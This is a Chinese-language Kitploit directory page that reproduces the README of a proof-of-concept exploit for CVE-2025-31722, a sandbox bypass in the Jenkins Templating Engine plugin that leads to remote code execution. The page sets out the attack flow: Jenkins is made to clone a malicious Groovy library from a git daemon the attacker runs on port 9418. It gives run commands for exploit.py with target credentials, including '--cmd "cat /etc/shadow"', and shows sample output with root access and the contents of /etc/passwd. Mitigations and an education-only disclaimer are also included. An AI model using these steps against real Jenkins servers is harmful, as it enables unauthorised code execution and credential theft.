Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-31722 — 针对Jenkins Templating Engine插件沙箱绕过(CVE-2025-31722)的概念验证漏洞利用,通过恶意Groovy库注入实现远程代码执行。 | Kitploit
工具/GitHubGitHub/h3raklez/cve-2025-31722
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubh3raklez/cve-2025-31722

CVE-2025-31722

针对Jenkins Templating Engine插件沙箱绕过(CVE-2025-31722)的概念验证漏洞利用,通过恶意Groovy库注入实现远程代码执行。

查看仓库
345个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-31722 — Jenkins Templating Engine RCE

仅供教育和授权安全研究使用。

描述

绕过 Jenkins Templating Engine (JTE) 插件 <= 2.5.3 的沙箱漏洞,允许低权限用户在 Jenkins 服务器上执行任意代码。

该缺陷的发生是由于 JTE 从文件夹级 GovernanceTier 配置中定义的外部 git 仓库加载库,并在 Groovy 沙箱之外执行这些库中的步骤,无论创建作业的用户权限级别如何。

CVSS: 8.8(高危)
类型: 沙箱绕过 → RCE
受影响组件: pipeline-templating-engine 插件 ≤ 2.5.3
修复版本: 2.5.4+


攻击流程

root@kitploit:~
攻击者 (Kali)                          Jenkins 服务器
───────────────                               ──────────────
1. 创建包含 evil.groovy 的 git 仓库
2. 在 :9418 启动 git daemon
3. 在 Jenkins 中创建文件夹          →    带 GovernanceTier 的文件夹
   指向 git://KALI:9418/…                   指向攻击者的仓库
4. 使用 AdHoc 模板创建作业             →    作业调用 evil()
5. 触发构建                           →    JTE 从 Kali 克隆仓库
                                         在沙箱外执行 evil()
                                     ←    以 Jenkins 用户身份执行 RCE

要求

Jenkins 服务器(目标)

  • 已安装 Templating Engine 2.5.3 插件的 Jenkins
  • 插件:cloudbees-folder、git、workflow-aggregator
  • 已禁用 CSRF
  • 具有 Item/READ、Item/CREATE、Item/CONFIGURE、Item/BUILD 权限的 attacker 用户
  • 内置节点在线且至少有一个执行器
  • 服务器到攻击者 IP 的出站网络连接,端口 9418

攻击者机器(Kali)

  • Python 3.8+
  • 已安装 git
  • Jenkins 服务器可访问的端口 9418
  • Python 库:requests
root@kitploit:~
pip install requests

实验室设置

在 Debian/Ubuntu 服务器上进行的安装已安装 Jenkins、配置用户、权限和所需插件。它不创建任何恶意内容——这完全由 PoC 处理。


使用方法

基本利用

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP>

自定义命令

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cmd "cat /etc/shadow"

清理

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cleanup

参数


PoC 工作原理

  1. setup_repo() — 在 Kali 上创建 ~/jte-exploit/evil-lib/steps/evil.groovy,包含要执行的命令
  2. start_git_daemon() — 在 Kali 上启动端口 9418 的 git daemon
  3. create_folder() — 在 Jenkins 中创建一个文件夹,其 GovernanceTier 指向 git://KALI:9418/jte-exploit
  4. create_job() — 使用 AdHocTemplateFlowDefinition 创建作业,声明 evil-lib 并调用 evil()
  5. trigger_and_wait() — 触发构建并等待结果
  6. print_output() — 显示包含 RCE 结果的控制台输出

git daemon 在整个构建周期内保持活动状态,并在构建完成后自动终止。


预期输出

root@kitploit:~
=================================================================
  CVE-2025-31722 — Jenkins Templating Engine RCE
  目标  : http://10.211.55.10:8080
  Git 主机: 10.211.55.7
  命令 : id && hostname && cat /etc/passwd
=================================================================

[+] 已验证身份: attacker (id=attacker)
[+] 仓库已创建: /root/jte-exploit
[+] 恶意步骤: evil-lib/steps/evil.groovy
[+] Git daemon 运行于 git://10.211.55.7:9418/jte-exploit
[+] 文件夹已创建
[+] 作业已创建
[+] 构建已排队

=================================================================
  CVE-2025-31722 — RCE 输出
=================================================================
[JTE] ...
uid=0(root) gid=0(root) groups=0(root)
debian
root:x:0:0:root:/root:/bin/bash
...
=================================================================

缓解措施

  • 将 Templating Engine 插件更新至 2.5.4 或更高版本
  • 仅将 Item/CREATE 和 Item/CONFIGURE 权限限制给受信任用户
  • 在 Jenkins 中启用 CSRF 保护
  • 审计指向外部仓库的 GovernanceTier 配置的文件夹

参考

  • Jenkins 安全公告
  • JTE 插件 GitHub

法律免责声明: 本 PoC 仅用于教育目的和在受控环境中进行测试。在未经明确授权的情况下将其用于系统是违法的。

下载工具
参数描述必需
--urlJenkins 基础 URL是
--user具有 Item/CREATE+CONFIGURE+BUILD 权限的用户是
--pass用户密码是
--git-hostJenkins 可访问的 Kali IP是
--cmd在服务器上执行的命令(默认:id && hostname && cat /etc/passwd)否
--cleanup删除由利用程序创建的文件夹、作业和仓库否